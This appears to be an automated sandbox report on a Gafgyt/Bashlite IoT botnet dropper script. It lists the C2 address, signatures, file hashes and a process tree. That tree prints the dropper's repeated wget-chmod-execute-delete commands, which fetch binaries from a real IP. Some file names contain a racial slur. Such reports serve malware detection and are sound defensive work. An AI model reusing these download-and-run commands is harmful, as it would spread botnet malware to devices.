Analysis

  • max time kernel
    101s
  • max time network
    17s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    03/08/2024, 04:52

General

  • Target

    bins.sh

  • Size

    1KB

  • MD5

    0019152fa30c6a1f5babd6dc28ff797f

  • SHA1

    06fbe116674f61cccd777f807c072569373c93ef

  • SHA256

    de36953ab2dd21eecd40090cdc4bdd7add909897c8835f20742df47d413cf7d3

  • SHA512

    14fda525ebe67725117dd3187168e9b0aba4c79d1d10133c204406ab217a7a88cab2a982761ba2f5bbd71afbed4af6b70327acf071ec4c50433de529287af1db

Score
10/10

Malware Config

Extracted

Family

gafgyt

C2

93.123.85.216:39

Signatures

  • Detected Gafgyt variant 9 IoCs
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

  • Executes dropped EXE 9 IoCs
  • Reads system routing table 1 TTPs 4 IoCs

    Gets active network interfaces from /proc virtual filesystem.

  • Reads system network configuration 1 TTPs 4 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Writes file to tmp directory 9 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:657
      • /usr/bin/wget
        wget http://93.123.85.216/boobs
        2⤵
        • Writes file to tmp directory
        PID:665
      • /bin/chmod
        chmod +x boobs
        2⤵
          PID:673
        • /tmp/boobs
          ./boobs
          2⤵
          • Executes dropped EXE
          PID:675
        • /bin/rm
          rm -rf boobs
          2⤵
            PID:678
          • /usr/bin/wget
            wget http://93.123.85.216/boobs2
            2⤵
            • Writes file to tmp directory
            PID:680
          • /bin/chmod
            chmod +x boobs2
            2⤵
              PID:686
            • /tmp/boobs2
              ./boobs2
              2⤵
              • Executes dropped EXE
              PID:688
            • /bin/rm
              rm -rf boobs2
              2⤵
                PID:691
              • /usr/bin/wget
                wget http://93.123.85.216/roof
                2⤵
                • Writes file to tmp directory
                PID:692
              • /bin/chmod
                chmod +x roof
                2⤵
                  PID:696
                • /tmp/roof
                  ./roof
                  2⤵
                  • Executes dropped EXE
                  PID:697
                • /bin/rm
                  rm -rf roof
                  2⤵
                    PID:699
                  • /usr/bin/wget
                    wget http://93.123.85.216/ppc
                    2⤵
                    • Writes file to tmp directory
                    PID:701
                  • /bin/chmod
                    chmod +x ppc
                    2⤵
                      PID:703
                    • /tmp/ppc
                      ./ppc
                      2⤵
                      • Executes dropped EXE
                      PID:704
                    • /bin/rm
                      rm -rf ppc
                      2⤵
                        PID:706
                      • /usr/bin/wget
                        wget http://93.123.85.216/sparc
                        2⤵
                        • Writes file to tmp directory
                        PID:707
                      • /bin/chmod
                        chmod +x sparc
                        2⤵
                          PID:708
                        • /tmp/sparc
                          ./sparc
                          2⤵
                          • Executes dropped EXE
                          PID:709
                        • /bin/rm
                          rm -rf sparc
                          2⤵
                            PID:711
                          • /usr/bin/wget
                            wget http://93.123.85.216/darkness
                            2⤵
                            • Writes file to tmp directory
                            PID:712
                          • /bin/chmod
                            chmod +x darkness
                            2⤵
                              PID:713
                            • /tmp/darkness
                              ./darkness
                              2⤵
                              • Executes dropped EXE
                              • Reads system routing table
                              • Reads system network configuration
                              PID:714
                            • /bin/rm
                              rm -rf darkness
                              2⤵
                                PID:717
                              • /usr/bin/wget
                                wget http://93.123.85.216/arm5
                                2⤵
                                • Writes file to tmp directory
                                PID:718
                              • /bin/chmod
                                chmod +x arm5
                                2⤵
                                  PID:719
                                • /tmp/arm5
                                  ./arm5
                                  2⤵
                                  • Executes dropped EXE
                                  • Reads system routing table
                                  • Reads system network configuration
                                  PID:720
                                • /bin/rm
                                  rm -rf arm5
                                  2⤵
                                    PID:723
                                  • /usr/bin/wget
                                    wget http://93.123.85.216/arm6
                                    2⤵
                                    • Writes file to tmp directory
                                    PID:724
                                  • /bin/chmod
                                    chmod +x arm6
                                    2⤵
                                      PID:727
                                    • /tmp/arm6
                                      ./arm6
                                      2⤵
                                      • Executes dropped EXE
                                      • Reads system routing table
                                      • Reads system network configuration
                                      PID:728
                                    • /bin/rm
                                      rm -rf arm6
                                      2⤵
                                        PID:732
                                      • /usr/bin/wget
                                        wget http://93.123.85.216/NIGGA7
                                        2⤵
                                        • Writes file to tmp directory
                                        PID:733
                                      • /bin/chmod
                                        chmod +x NIGGA7
                                        2⤵
                                          PID:737
                                        • /tmp/NIGGA7
                                          ./NIGGA7
                                          2⤵
                                          • Executes dropped EXE
                                          • Reads system routing table
                                          • Reads system network configuration
                                          PID:738
                                        • /bin/rm
                                          rm -rf NIGGA7
                                          2⤵
                                            PID:741

                                        Network

                                              MITRE ATT&CK Enterprise v15

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • /tmp/NIGGA7

                                                Filesize

                                                275KB

                                                MD5

                                                658e8ab8f1bf7db543aa9b2b2fd595ce

                                                SHA1

                                                ce122d9bc9920bbd77826fcd7676f3081ec19752

                                                SHA256

                                                29e40415b4a7a270bd679a81ae16ab70c15d7a525b5701da5ce494600f60831c

                                                SHA512

                                                eb8056c08a88ce14bb4a028f9f93a70dfb54e0a83ac565ddb2c4d4ef8aeafba7b8105e4e14bd807ebcb46d987d625e3ccae655c3170ee5cc51b513a542e4984f

                                              • /tmp/arm5

                                                Filesize

                                                216KB

                                                MD5

                                                e57c0097d80d17a52aad01a8c2e4f9fc

                                                SHA1

                                                fffadcdb51b879236df4d4cdf373216dd926e90e

                                                SHA256

                                                68a34ef0cc4e40fb5470c235ed5f2b583b619549b546dcfda3101d847f3e2f3a

                                                SHA512

                                                02e7100e343d14f88a1f68539dea16c633e8de9fb6859cf54c60873565f7666595a5ee131bc38ea5f5b306a740b7f8c8db68f3a124b77c9f63eee8f492d75464

                                              • /tmp/arm6

                                                Filesize

                                                238KB

                                                MD5

                                                1e78f279e22858585947a52ad8b127d7

                                                SHA1

                                                62f68fbf960fd0bfda74d5d89d74cbf8eaa630f7

                                                SHA256

                                                616160f4a408c4dfe23d91f102a4f7db79e005b75013f34b4d0ea2e35a047377

                                                SHA512

                                                2d5439708fd887b3b9b79f877d0f1474c277b6459221726d428e96cdc1fdfea7665bdaab03c7a77df720713cc5eb9e90a5177f2c27212a2c5993b9338ce39921

                                              • /tmp/boobs

                                                Filesize

                                                246KB

                                                MD5

                                                1f918589efbef4b04e806b7a38fc63f8

                                                SHA1

                                                758f7a47b66a52ce59462ffd1c0f223af618077c

                                                SHA256

                                                267bb586e092048c02e1533df5594bcdcb7d7bc45e1d7c249b624732af65b2b4

                                                SHA512

                                                d3d22ba6f725b0a02abd78ab62dd231b95ef17ed69376c836ab03bfc78f9e2c841b283c8eb0ee3adb4d4e7785b003afbd76197e965a6c2f09ed773d723132cbb

                                              • /tmp/boobs2

                                                Filesize

                                                246KB

                                                MD5

                                                348a8f1c5535fe6a0a698f457c329485

                                                SHA1

                                                a3415c48c1d18776ab9a02ef23fe65cef88af354

                                                SHA256

                                                c11cdb76aa08f72fd9624c68a74776342c8eec86075bcfeca88c83d5d830c0e8

                                                SHA512

                                                e3ef6a9edc6f59eea05403785ef2bef8005248d0ec4f8714e733c1c895a6bd267e6f44c9409c4cd877a3b48dd92e7715ea00dec1e95193833234df0245e4991c

                                              • /tmp/darkness

                                                Filesize

                                                224KB

                                                MD5

                                                24393febb5e8a233a8df7f00b8c3b147

                                                SHA1

                                                f8240c5256c8a193ee8f2f93880203eca2f827d5

                                                SHA256

                                                49eaa16a775f35ae87b75eb7a31dc421adff1054ca3af19ec6a6c90e83f47d42

                                                SHA512

                                                be1ca8c139095fe4be2f8cbcdc4f5adf304e05a3f0f1f94b2c522957de0ce197b6ab8e16a17d1e3d8afbb06d9b3019bca134eeba3197bd6917fadb144a9a86c6

                                              • /tmp/ppc

                                                Filesize

                                                209KB

                                                MD5

                                                5cf85a36699cca11be8c96c3232654e0

                                                SHA1

                                                897379599414d22c9adf9b542266eb6b888b6542

                                                SHA256

                                                d0fa6a48fc3767aa569af289cdd06699c183839f942465540a2bdc112e151419

                                                SHA512

                                                de9e55d3fec5bcb0791922ff7e2fc1addd8e76e83ad3a018cdd67cf3ddde2cc09571a520349361acf9024123ba5976bd68f1aaeec82693103149290bff6be552

                                              • /tmp/roof

                                                Filesize

                                                211KB

                                                MD5

                                                ca477454b7145f6d2180e32c6f0135f6

                                                SHA1

                                                da25e63ea1e5fed9abf321ddf4a82eaa76717bb6

                                                SHA256

                                                6a9406b7230fd0f2b6471bc341dba064b48959aa46e51759c3fafebd50e837d4

                                                SHA512

                                                561199819d8b51d51abc6a3fb786f45c28d5b04904efec549fddc4f35b36a45a66c54fb44d4a2f5c1139374c0f3bdd52f3abd565d67e383c25d338193e699d80

                                              • /tmp/sparc

                                                Filesize

                                                226KB

                                                MD5

                                                0e2c431d0b76d5d91af24cd90532cd93

                                                SHA1

                                                402554d878c7e73cdf145bb249c604a21e465e1f

                                                SHA256

                                                16c5cfb57ffcd3bd87e44f2c754d7fa6634c71cc06cf5d11a743d899cb546257

                                                SHA512

                                                8b0adab651805ea96e702e49013ae9e16d6858f0667bca352eefc12ae28d625f4a68135b915a14572ddec48ea22470e6d6dd9c91a2c4bfa03e35586ef6a246cc